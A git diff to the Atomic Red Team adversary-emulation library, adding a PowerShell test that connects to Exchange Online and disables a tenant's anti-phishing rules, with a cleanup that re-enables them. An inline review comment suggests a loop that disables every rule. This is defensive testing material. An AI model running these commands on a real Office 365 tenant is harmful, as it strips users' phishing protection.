diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json
index c35e563a..f9a8214d 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json
@@ -1 +1 @@
-{"version":"4.2","name":"Atomic Red Team (Office-365)","description":"Atomic Red Team (Office-365) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[]}
\ No newline at end of file
+{"version":"4.2","name":"Atomic Red Team (Office-365)","description":"Atomic Red Team (Office-365) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index f12bbbeb..44028ad9 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -343,6 +343,7 @@ defense-evasion,T1562.001,Disable or Modify Tools,21,Uninstall Crowdstrike Falco
defense-evasion,T1562.001,Disable or Modify Tools,22,Tamper with Windows Defender Evade Scanning -Folder,0b19f4ee-de90-4059-88cb-63c800c683ed,powershell
defense-evasion,T1562.001,Disable or Modify Tools,23,Tamper with Windows Defender Evade Scanning -Extension,315f4be6-2240-4552-b3e1-d1047f5eecea,powershell
defense-evasion,T1562.001,Disable or Modify Tools,24,Tamper with Windows Defender Evade Scanning -Process,a123ce6a-3916-45d6-ba9c-7d4081315c27,powershell
+defense-evasion,T1562.001,Disable or Modify Tools,25,office-365-Disable-AntiPhishRule,b9bbae2c-2ba6-4cf3-b452-8e8f908696f3,powershell
defense-evasion,T1574.006,Dynamic Linker Hijacking,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
defense-evasion,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
defense-evasion,T1055.001,Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv
index bd4769f1..a9f57a20 100644
--- a/atomics/Indexes/Indexes-CSV/linux-index.csv
+++ b/atomics/Indexes/Indexes-CSV/linux-index.csv
@@ -97,6 +97,7 @@ defense-evasion,T1562.001,Disable or Modify Tools,1,Disable syslog,4ce786f8-e601
defense-evasion,T1562.001,Disable or Modify Tools,2,Disable Cb Response,ae8943f7-0f8d-44de-962d-fbc2e2f03eb8,sh
defense-evasion,T1562.001,Disable or Modify Tools,3,Disable SELinux,fc225f36-9279-4c39-b3f9-5141ab74f8d8,sh
defense-evasion,T1562.001,Disable or Modify Tools,4,Stop Crowdstrike Falcon on Linux,828a1278-81cc-4802-96ab-188bf29ca77d,sh
+defense-evasion,T1562.001,Disable or Modify Tools,25,office-365-Disable-AntiPhishRule,b9bbae2c-2ba6-4cf3-b452-8e8f908696f3,powershell
defense-evasion,T1574.006,Dynamic Linker Hijacking,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
defense-evasion,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
defense-evasion,T1070.004,File Deletion,1,Delete a single file - Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 08c541da..0ab7a8b7 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -573,6 +573,7 @@
- Atomic Test #22: Tamper with Windows Defender Evade Scanning -Folder [windows]
- Atomic Test #23: Tamper with Windows Defender Evade Scanning -Extension [windows]
- Atomic Test #24: Tamper with Windows Defender Evade Scanning -Process [windows]
+ - Atomic Test #25: office-365-Disable-AntiPhishRule [office-365]
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md
index f364dbbc..49bcc017 100644
--- a/atomics/Indexes/Indexes-Markdown/linux-index.md
+++ b/atomics/Indexes/Indexes-Markdown/linux-index.md
@@ -220,6 +220,7 @@
- Atomic Test #2: Disable Cb Response [linux]
- Atomic Test #3: Disable SELinux [linux]
- Atomic Test #4: Stop Crowdstrike Falcon on Linux [linux]
+ - Atomic Test #25: office-365-Disable-AntiPhishRule [office-365]
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1484.002 Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index cb20e020..37676f1b 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -24532,6 +24532,52 @@ defense-evasion:
Remove-MpPreference -ExclusionProcess $excludedProcess
name: powershell
elevation_required: true
+ - name: office-365-Disable-AntiPhishRule
+ auto_generated_guid: b9bbae2c-2ba6-4cf3-b452-8e8f908696f3
+ description: 'Using the Disable-AntiPhishRule cmdlet to disable antiphish rules
+ in your office-365 organization.
+
+'
+ supported_platforms:
+ - office-365
+ input_arguments:
+ username:
+ description: office-365 username
+ type: String
+ default:
+ password:
+ description: office-365 password
+ type: String
+ default:
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'ExchangeOnlineManagement PowerShell module must be installed
+
+'
+ prereq_command: |
+ $RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Connect-ExchangeOnline']) {exit 1} else {exit 0}
+ get_prereq_command: |
+ Install-Module -Name ExchangeOnlineManagement
+ Import-Module ExchangeOnlineManagement
+ executor:
+ command: |
+ $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+ $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+ Connect-ExchangeOnline -Credential $creds
+ $test = Get-AntiPhishRule
+ Disable-AntiPhishRule -Identity $test.Name -Confirm:$false
+ Get-AntiPhishRule
+ cleanup_command: |
+ $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+ $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+ Connect-ExchangeOnline -Credential $creds
+ $test = Get-AntiPhishRule
+ Enable-AntiPhishRule -Identity $test.Name -Confirm:$false
+ Get-AntiPhishRule
+ name: powershell
+ elevation_required: false
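Review bot: The executor's `$test = Get-AntiPhishRule` followed by `Disable-AntiPhishRule -Identity $test.Name -Confirm:$false` only works when the tenant has exactly one anti-phish rule; with several rules `$test.Name` is an array and `-Identity` receives an invalid value, and with none it is null, so the test fails on both common tenant shapes. The cleanup_command has the same shape and additionally re-enables every rule, including any that were already disabled before the test ran, which the description does not mention. Iterating over the rules (fence below) fixes both scripts; the cleanup mirrors it with `Enable-AntiPhishRule`, and a sentence in `description` such as "Cleanup re-enables all anti-phish rules, including any disabled prior to the test." would make the side effect explicit. The same commands are rendered into atomics/T1562.001/T1562.001.md later in this diff and will need regenerating.

```powershell
$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
Connect-ExchangeOnline -Credential $creds -ShowBanner:$false
$rules = @(Get-AntiPhishRule)
if ($rules.Count -eq 0) { Write-Host "No anti-phish rules found in this tenant"; exit 0 }
foreach ($rule in $rules) {
  Disable-AntiPhishRule -Identity $rule.Name -Confirm:$false
}
Get-AntiPhishRule
# … cleanup_command: same loop with Enable-AntiPhishRule …
```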
T1078.002:
technique:
external_references:
diff --git a/atomics/T1562.001/T1562.001.md b/atomics/T1562.001/T1562.001.md
index ba2e2af9..7164b66b 100644
--- a/atomics/T1562.001/T1562.001.md
+++ b/atomics/T1562.001/T1562.001.md
@@ -52,6 +52,8 @@
- [Atomic Test #24 - Tamper with Windows Defender Evade Scanning -Process](#atomic-test-24---tamper-with-windows-defender-evade-scanning--process)
+- [Atomic Test #25 - office-365-Disable-AntiPhishRule](#atomic-test-25---office-365-disable-antiphishrule)
+
@@ -996,4 +998,67 @@ Remove-MpPreference -ExclusionProcess $excludedProcess
+
+
+
+## Atomic Test #25 - office-365-Disable-AntiPhishRule
+Using the Disable-AntiPhishRule cmdlet to disable antiphish rules in your office-365 organization.
+
+**Supported Platforms:** Office-365
+
+
+**auto_generated_guid:** b9bbae2c-2ba6-4cf3-b452-8e8f908696f3
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| username | office-365 username | String | |
+| password | office-365 password | String | |
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+Connect-ExchangeOnline -Credential $creds
+$test = Get-AntiPhishRule
+Disable-AntiPhishRule -Identity $test.Name -Confirm:$false
+Get-AntiPhishRule
+```
+
+#### Cleanup Commands:
+```powershell
+$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+Connect-ExchangeOnline -Credential $creds
+$test = Get-AntiPhishRule
+Enable-AntiPhishRule -Identity $test.Name -Confirm:$false
+Get-AntiPhishRule
+```
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: ExchangeOnlineManagement PowerShell module must be installed
+##### Check Prereq Commands:
+```powershell
+$RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable
+if (-not $RequiredModule) {exit 1}
+if (-not $RequiredModule.ExportedCommands['Connect-ExchangeOnline']) {exit 1} else {exit 0}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name ExchangeOnlineManagement
+Import-Module ExchangeOnlineManagement
+```
+
+
+
+